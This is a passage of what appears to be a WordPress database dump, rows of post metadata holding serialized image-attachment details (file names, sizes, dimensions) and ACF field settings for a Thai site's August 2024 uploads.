(512,161,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:61:\"2024/08/454267525_122167799384202781_905961670854441852_n.jpg\";s:8:\"filesize\";i:193384;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"454267525_122167799384202781_905961670854441852_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15940;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"454267525_122167799384202781_905961670854441852_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"454267525_122167799384202781_905961670854441852_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6956;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"454267525_122167799384202781_905961670854441852_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68967;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"454267525_122167799384202781_905961670854441852_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191284;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"454267525_122167799384202781_905961670854441852_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16933;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(513,162,'_wp_attached_file','2024/08/454010015_122167799234202781_6887725117770515048_n.jpg'),
(514,162,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/08/454010015_122167799234202781_6887725117770515048_n.jpg\";s:8:\"filesize\";i:204383;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"454010015_122167799234202781_6887725117770515048_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16904;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"454010015_122167799234202781_6887725117770515048_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112167;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"454010015_122167799234202781_6887725117770515048_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7353;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"454010015_122167799234202781_6887725117770515048_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72940;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"454010015_122167799234202781_6887725117770515048_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198609;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"454010015_122167799234202781_6887725117770515048_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(515,163,'_wp_attached_file','2024/08/454032909_122167799336202781_3575994108604847462_n.jpg'),
(516,163,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/08/454032909_122167799336202781_3575994108604847462_n.jpg\";s:8:\"filesize\";i:209389;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"454032909_122167799336202781_3575994108604847462_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17931;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"454032909_122167799336202781_3575994108604847462_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115044;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"454032909_122167799336202781_3575994108604847462_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7831;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"454032909_122167799336202781_3575994108604847462_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75105;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"454032909_122167799336202781_3575994108604847462_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205137;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"454032909_122167799336202781_3575994108604847462_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(517,158,'_thumbnail_id','159'),
(518,158,'_edit_last','1'),
(519,158,'title_style','default'),
(520,158,'_title_style','field_5d1a0217cf408'),
(521,158,'related_0_post',''),
(522,158,'_related_0_post','field_603b51e5e183f'),
(523,158,'related','1'),
(524,158,'_related','field_603b51c3e183e'),
(525,164,'title_style','default'),
(526,164,'_title_style','field_5d1a0217cf408'),
(527,164,'related_0_post',''),
(528,164,'_related_0_post','field_603b51e5e183f'),
(529,164,'related','1'),
(530,164,'_related','field_603b51c3e183e'),
(534,165,'title_style','default'),
(535,165,'_title_style','field_5d1a0217cf408'),
(536,165,'related_0_post',''),
(537,165,'_related_0_post','field_603b51e5e183f'),
(538,165,'related','1'),
(539,165,'_related','field_603b51c3e183e'),
(542,167,'title_style','default'),
(543,167,'_title_style','field_5d1a0217cf408'),
(544,167,'related_0_post',''),
(545,167,'_related_0_post','field_603b51e5e183f'),
(546,167,'related','1'),
(547,167,'_related','field_603b51c3e183e'),
(550,168,'title_style','default'),
(551,168,'_title_style','field_5d1a0217cf408'),
(552,168,'related_0_post',''),
(553,168,'_related_0_post','field_603b51e5e183f'),
(554,168,'related','1'),
(555,168,'_related','field_603b51c3e183e'),
(572,171,'_wp_attached_file','2024/08/454010015_122167799234202781_6887725117770515048_n-1.jpg'),
(573,171,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2024/08/454010015_122167799234202781_6887725117770515048_n-1.jpg\";s:8:\"filesize\";i:204383;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"454010015_122167799234202781_6887725117770515048_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16904;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"454010015_122167799234202781_6887725117770515048_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112167;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"454010015_122167799234202781_6887725117770515048_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7353;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"454010015_122167799234202781_6887725117770515048_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72940;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"454010015_122167799234202781_6887725117770515048_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198609;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"454010015_122167799234202781_6887725117770515048_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(574,172,'title_style','default'),
(575,172,'_title_style','field_5d1a0217cf408'),
(576,172,'related_0_post',''),
(577,172,'_related_0_post','field_603b51e5e183f'),
(578,172,'related','1'),
(579,172,'_related','field_603b51c3e183e'),
(583,158,'_generateblocks_dynamic_css_version','1.9.1'),
(584,174,'title_style','default'),
(585,174,'_title_style','field_5d1a0217cf408'),
(586,174,'related_0_post',''),
(587,174,'_related_0_post','field_603b51e5e183f'),
(588,174,'related','1'),
(589,174,'_related','field_603b51c3e183e'),
(591,26,'_wp_old_date','2024-07-27'),
(593,35,'_wp_old_date','2024-07-27'),
(595,36,'_wp_old_date','2024-07-27'),
(597,37,'_wp_old_date','2024-07-27'),
(599,38,'_wp_old_date','2024-07-27'),
(601,39,'_wp_old_date','2024-07-27'),
(609,177,'_edit_lock','1724839240:2'),
(610,178,'_wp_attached_file','2024/08/www.karnmuangchumchon.com-1723275045574-696x392-1.jpg'),
(611,178,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:696;s:6:\"height\";i:392;s:4:\"file\";s:61:\"2024/08/www.karnmuangchumchon.com-1723275045574-696x392-1.jpg\";s:8:\"filesize\";i:77587;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"www.karnmuangchumchon.com-1723275045574-696x392-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20012;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"www.karnmuangchumchon.com-1723275045574-696x392-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9508;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"www.karnmuangchumchon.com-1723275045574-696x392-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(614,177,'_thumbnail_id','178'),
(615,177,'_edit_last','1'),
(618,177,'title_style','default'),
(619,177,'_title_style','field_5d1a0217cf408'),
(620,177,'related',''),
(621,177,'_related','field_603b51c3e183e'),
(622,179,'title_style','default'),
(623,179,'_title_style','field_5d1a0217cf408'),
(624,179,'related',''),
(625,179,'_related','field_603b51c3e183e'),
(626,180,'_wp_attached_file','2024/08/www.karnmuangchumchon.com-1723274955542.jpg'),
(627,180,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:501;s:4:\"file\";s:51:\"2024/08/www.karnmuangchumchon.com-1723274955542.jpg\";s:8:\"filesize\";i:69082;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"www.karnmuangchumchon.com-1723274955542-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18102;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"www.karnmuangchumchon.com-1723274955542-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8822;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:51:\"www.karnmuangchumchon.com-1723274955542-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(629,182,'_wp_attached_file','2024/08/www.karnmuangchumchon.com-1723275045574-696x392-2.jpg'),
(630,182,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:696;s:6:\"height\";i:392;s:4:\"file\";s:61:\"2024/08/www.karnmuangchumchon.com-1723275045574-696x392-2.jpg\";s:8:\"filesize\";i:77587;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"www.karnmuangchumchon.com-1723275045574-696x392-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20012;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"www.karnmuangchumchon.com-1723275045574-696x392-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9508;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"www.karnmuangchumchon.com-1723275045574-696x392-2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(631,177,'_generateblocks_dynamic_css_version','1.9.1'),
(634,183,'title_style','default'),
(635,183,'_title_style','field_5d1a0217cf408'),
(636,183,'related',''),
(637,183,'_related','field_603b51c3e183e'),
(639,185,'_wp_attached_file','2024/08/453971114_122167799222202781_3841640128629440766_n-1.jpg'),
(640,185,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2024/08/453971114_122167799222202781_3841640128629440766_n-1.jpg\";s:8:\"filesize\";i:284535;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"453971114_122167799222202781_3841640128629440766_n-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23556;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"453971114_122167799222202781_3841640128629440766_n-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159560;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"453971114_122167799222202781_3841640128629440766_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7903;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"453971114_122167799222202781_3841640128629440766_n-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103104;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"453971114_122167799222202781_3841640128629440766_n-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:278357;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"453971114_122167799222202781_3841640128629440766_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19259;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(641,186,'_wp_attached_file','2024/08/454267525_122167799384202781_905961670854441852_n-1.jpg'),
(642,186,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:63:\"2024/08/454267525_122167799384202781_905961670854441852_n-1.jpg\";s:8:\"filesize\";i:193384;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"454267525_122167799384202781_905961670854441852_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15940;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"454267525_122167799384202781_905961670854441852_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"454267525_122167799384202781_905961670854441852_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6956;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"454267525_122167799384202781_905961670854441852_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68967;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"454267525_122167799384202781_905961670854441852_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191284;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:63:\"454267525_122167799384202781_905961670854441852_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16933;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(647,187,'title_style','default'),
(648,187,'_title_style','field_5d1a0217cf408'),
(649,187,'related_0_post',''),
(650,187,'_related_0_post','field_603b51e5e183f'),
(651,187,'related','1'),
(652,187,'_related','field_603b51c3e183e'),
(653,189,'_edit_lock','1724839182:2'),
(654,190,'_wp_attached_file','2024/08/453598109_122166666050202781_4790432778834187912_n.jpg'),
(655,190,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:417;s:6:\"height\";i:590;s:4:\"file\";s:62:\"2024/08/453598109_122166666050202781_4790432778834187912_n.jpg\";s:8:\"filesize\";i:77778;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"453598109_122166666050202781_4790432778834187912_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24800;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"453598109_122166666050202781_4790432778834187912_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10283;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"453598109_122166666050202781_4790432778834187912_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23985;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(658,189,'_thumbnail_id','192'),
(659,189,'_edit_last','2'),
(660,189,'title_style','default'),
(661,189,'_title_style','field_5d1a0217cf408'),
(662,189,'related',''),
(663,189,'_related','field_603b51c3e183e'),
(664,191,'title_style','default'),
(665,191,'_title_style','field_5d1a0217cf408'),
(666,191,'related',''),
(667,191,'_related','field_603b51c3e183e'),
(668,192,'_wp_attached_file','2024/08/453195035_122166674972202781_6455172251476872797_n.jpg'),
(669,192,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/08/453195035_122166674972202781_6455172251476872797_n.jpg\";s:8:\"filesize\";i:285092;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"453195035_122166674972202781_6455172251476872797_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21338;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"453195035_122166674972202781_6455172251476872797_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154836;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"453195035_122166674972202781_6455172251476872797_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8774;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"453195035_122166674972202781_6455172251476872797_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97952;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"453195035_122166674972202781_6455172251476872797_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273001;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"453195035_122166674972202781_6455172251476872797_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22490;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(676,194,'title_style','default'),
(677,194,'_title_style','field_5d1a0217cf408'),
(678,194,'related',''),
(679,194,'_related','field_603b51c3e183e'),
(680,26,'_wp_old_date','2024-08-15'),
(682,35,'_wp_old_date','2024-08-15'),
(684,36,'_wp_old_date','2024-08-15'),
(686,37,'_wp_old_date','2024-08-15'),
(688,38,'_wp_old_date','2024-08-15'),
(690,39,'_wp_old_date','2024-08-15'),
(693,197,'title_style','default'),
(694,197,'_title_style','field_5d1a0217cf408'),
(696,199,'_wp_attached_file','2024/08/EIT_QRCode.png'),
(697,199,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:22:\"2024/08/EIT_QRCode.png\";s:8:\"filesize\";i:567;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"EIT_QRCode-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1744;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"EIT_QRCode-300x189.png\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1192;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(698,200,'_wp_attached_file','2024/08/EIT_QRCode-1.png'),
(699,200,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:24:\"2024/08/EIT_QRCode-1.png\";s:8:\"filesize\";i:567;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"EIT_QRCode-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1744;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"EIT_QRCode-1-300x189.png\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1192;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"